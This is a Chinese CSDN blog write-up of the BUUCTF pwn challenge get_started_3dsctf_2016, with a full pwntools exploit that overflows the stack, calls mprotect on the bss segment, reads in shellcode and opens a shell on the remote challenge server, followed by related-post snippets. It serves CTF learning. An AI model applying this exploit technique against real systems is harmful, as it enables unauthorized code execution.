BUUCTF get_started_3dsctf_2016

最新推荐文章于 2024-01-12 16:48:11 发布
最新推荐文章于 2024-01-12 16:48:11 发布
阅读量1.2k 收藏
点赞数
分类专栏: 题目 BUUCTF 文章标签: buuctf pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37433000/article/details/102056006
版权

这道题和昨天差不多栈溢出覆盖返回地址然后把bss段mprotect可读可写可执行然后写入shellcode跳入bss段即可
exp:

from pwn import *

def debug():
	gdb.attach(p)
#p=process('./getstarted')
p=remote('node2.buuoj.cn.wetolink.com',28646)
elf=ELF('./getstarted')
pop3_ret=0x0804951D
payload='a'*0x38+p32(elf.symbols['mprotect'])+p32(pop3_ret)+p32(0x080EB000)+p32(0x1000)+p32(0x7)+p32(elf.symbols['read'])+p32(pop3_ret)+p32(0)+p32(0x080EBF81)+p32(0x100)+p32(0x080EBF81)
#debug()
p.sendline(payload)
sleep(0.2)
#pause()
payload=asm(shellcraft.sh())
p.sendline(payload)

p.interactive()
doudoudedi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
get_started_3dsctf_2016
qq_45691294的博客
12-17 1326
先进入到题目环境里,程序接收用户输入,然后返回一串字符 checksec查看一下保护,只开启了NX,堆栈不可执行保护 用IDA分析程序,这一段程序很简短,gets函数存在溢出 发现了一个名为get_flag的函数 通过这个函数传入参数,且满足条件(a1 == 814536271 && a2 == 425138641)即可读取到flag 思路就是main函数溢出到返回地址的时候直接溢出到if条件判断里面,即使栈空间被破坏了,但是无所谓,已经输出flag了 这里可以用本地调试判断偏移量
get_started_3dsctf_2016BUUCTF】(两种解法)
qq_41696518的博客
08-27 1196
get_started_3dsctf_2016
【CTF】get_started_3dsctf_2016
凉水的博客
01-19 608
解题思路: 1 先反编译,第一印象代码比较多、杂,找main函数找了半天才找到。 undefined4 main(void) { char local_38 [56]; printf("Qual a palavrinha magica? "); gets(local_38); return 0; } 2 看main函数,第一感觉是典型的栈溢出。然后就是ELF的一些保护。 Arch: i386-32-little RELRO: Partial RELRO Stack:
get_started_3dsctf_2016|get_started_3dsctf_2016
12-11
网络安全逆向PWN题目,简单的栈溢出,虽然有后门函数,但同时又给了一定的限制条件,可以使用更复杂的ROP解法。该样本题解:https://blog.csdn.net/A951860555/article/details/111030289
BUUCTFPWN】not_the_same_3dsctf_2016
m0_55368674的博客
01-12 328
BUUCTF - PWN】not_the_same_3dsctf_2016题解
get_started_complete_Windows编程_
10-02
在本文中,我们将深入探讨"get_started_complete"这个主题,特别是关于Windows编程的入门知识。Windows编程是开发针对Microsoft Windows操作系统应用的过程,它涉及到使用特定的API(应用程序接口)和其他工具来创建...
LinkIt_for_RTOS_Get_Started_Guide.pdf
06-23
LinkIt_for_RTOS_Get_Started_Guide.pdf
PHP file_get_contents设置超时处理方法
10-26
今天说的这篇是讲超时的,确实在跨服务器提交的时候,不可避免的会遇到超时的情况,这个时候怎么办?set_time_limit是没有用的,只有用context中的timeout时间来控制
解决file_get_contents无法请求https连接的方法
10-26
3. **使用cURL替代file_get_contents**: 如果您无法修改服务器配置,或者上述方法不适用,您可以选择使用cURL库来代替 `file_get_contents`。cURL是一个强大的URL传输库,支持多种协议,包括HTTPS。下面是一个使用...
buuctf|buuctf|get_started_3dsctf_2016 1
m0_64236521的博客
05-01 340
方法一 我将文件下载后将其重命名为pwn_13,checksec一下 可以直接栈溢出,32位,进入ida gets(v4)可以栈溢出,这里没找到后门函数,只发现了get_flag函数,进去看看 只要a1,a2满足值便可以输出flag,a1和a2是函数参数,我们可以进行传入,同时为了让get_flag正常结束,我们要使其返回函数为exit() exp如下 from pwn import* p=remote('node4.buuoj.cn',26832) context.log_level='debu
not_the_same_3dsctf_2016 wp (python3)
Kata_Jhin的博客
03-14 141
not_the_same_3dsctf_2016 wp (python3)
BUUCTF-not_the_same_3dsctf_2016
Fzuim的博客
03-03 1611
这是一道pwn题目IDA查看伪代码查看编译属性思路1,本地可打通,远程不行思路2,正确解法答案 IDA查看伪代码 main函数gets函数存在栈溢出攻击 通过查看字符串列表,发现有个get_secret读取flag.txt后门函数 查看编译属性 思路1,本地可打通,远程不行 也是最简单的,payload构造溢出返回到get_secret函数,并printf打印出fl4g,payload如下 #coding=utf8 from pwn import * context.log_level = 'deb
get_started_3dsctf_2016 题解
lifanxin的博客
12-11 1033
Write Up知识点关键字样本运行静态分析动态调试求解思路求解脚本 知识点关键字 栈溢出,ROP + shellcode 样本 get_started_3dsctf_2016样本下载 运行 检查文件:   32位小端程序;   开启了NX保护,栈保护未开启。 运行程序: 静态分析 动态调试 求解思路 求解脚本 ...
BUUCTF--get_started_3dsctf_20161
最新发布
qq_30528603的博客
01-12 454
题目一进来有很多函数,盲猜是静态编译了。而且在函数堆中发现了个get_flag。信心慢慢的直接写代码返回get_flag地址。2.这题在main函数开始的时候没有压入ebp,因此计算溢出位置不用覆盖ebp。也就是说以前的old_ebp的位置变成了现在的返回地址。1.打远程的时候他将会判断参数是否合规,因此我们要构造get_flag的参数的正确性。这题我本来以为是简单的ret2text.结果还是中了小坑。4.构造垃圾数据不用b‘a',打不通。这题还有一种解法,我是看别的师傅wp才知道的。
[BUUCTF-pwn]——not_the_same_3dsctf_2016
Y_peak的博客
02-10 741
not_the_same_3dsctf_2016 题目地址:https://buuoj.cn/challenges#not_the_same_3dsctf_2016 首先checksec一下,看看32位程序 在IDA中,发现栈溢出典型函数gets函数,这里注意这个main函数没有ebp shift+F12看下,发现了flag.txt这种敏感 字符串 找到调用的函数get_secret函数 函数调用后,flag储存在fl4g里面,我们找到fl4g的位置 找到可以输出的write函数 下面我们就可
BUUCTF not_the_same_3dsctf_2016
zgwz123456的博客
06-14 163
checksec 检查开启了什么保护 开启了nx保护 本地执行一下并没有看出啥 拉入32位ida 主函数代码,接着找找字符串 发现flag.txt,找到调用它的函数 我是个pwn小白,一开始以为直接在main的get函数里溢出覆盖返回地址到这个函数就可以了,构造payload后发现程序卡住了 然后看其他大佬的解题思路,发现从mprotect这个函数入手 32位程序参数从栈上传,但我们要保证栈平衡来让程序继续正常运行,所以我们要找三个pop,把我们构造的参数弹出去 利用工具找到我们需要的pop地址 R
sqlite3_get_table所有操作
05-13
sqlite3_get_table是一个SQLite C/C++ API函数,用于执行SQL查询并返回查询结果。它返回的结果是一个包含查询结果的二维数组。下面是sqlite3_get_table的所有操作: ```c int sqlite3_get_table( sqlite3 *db, /* ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值